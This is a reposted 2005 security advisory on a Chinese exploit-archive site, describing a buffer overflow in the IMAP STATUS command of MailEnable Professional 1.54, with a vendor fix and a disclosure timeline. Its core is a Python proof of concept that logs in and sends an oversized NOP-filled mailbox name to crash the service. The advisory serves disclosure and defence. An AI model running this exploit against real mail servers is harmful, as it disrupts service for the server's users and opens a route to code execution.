首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MailEnable STATUS Command Buffer Overflow
来源:http://www.coresecurity.com 作者:coresecurity 发布时间:2005-07-19  

MailEnable STATUS Command Buffer Overflow

Summary
"MailEnable is a mail server software which provides a messaging platform for Microsoft Windows."

A buffer overflow in the MailEnable's STATUS command support allows attackers to execute arbitrary code with elevated privileges.

Credit:
The information has been provided by Core Security Technologies .
The original article can be found at: http://www.coresecurity.com/common/showdoc.php?idx=467&idxseccion=10

Details
Vulnerable Systems:
* MailEnable Professional edition version 1.54

Immune Systems:
* MailEnable Professional edition version 1.6

MailEnable's support for IMAP status command can be exploited to cause the product to overflow an internal buffer, the following exploit code will overflow the buffer with a NOP sled.

Proof of Concept:
#
# POC about imapd mailenable bug in status command
#

import sys
import imaplib

class poc:

def __init__(self,host,loginimap,passimap):
self.host=host
self.loginimap=loginimap
self.passimap=passimap

def exploit(self):
print "Please wait"

connect = imaplib.IMAP4(self.host)
connect.login(self.loginimap,self.passimap)
nops='\x00'
nops+='\x90'*10540
try:
typ, data = connect.status(nops,'(UIDNEXT UIDVALIDITY MESSAGES UNSEEN RECENT)')
except Exception,e:
print "Service down!"
return 0

if(len(sys.argv) < 4):
print "Need 3 arguments, ./poc.py host user pass"
sys.exit(1)

exp=poc(sys.argv[1],sys.argv[2],sys.argv[3])
exp.exploit()

#EoF

Disclosure Timeline:
2005-06-30: Notification to vendor.
2005-06-30: Vendor acknowledged notification and provided a fix.
2005-07-12: Public Disclosure.



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Internet Explorer's Image Deco
·Greasemonkey Firefox Extension
·Winamp ID3v2 Buffer Overflow
·Microsoft Color Management Mod
·GNU Mailutils imap4d Remote Pr
·Windows Netman Service Local D
·FutureSoft TFTP Server 2000 Re
·GNU Mailutils imap4d Format St
·PHP XML-RPC Module <= 1.3.0
·OpenBB CID SQL Injection
·Mozilla Firefox <= 1.0.4 da
·phpSlash Account Hijacking
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved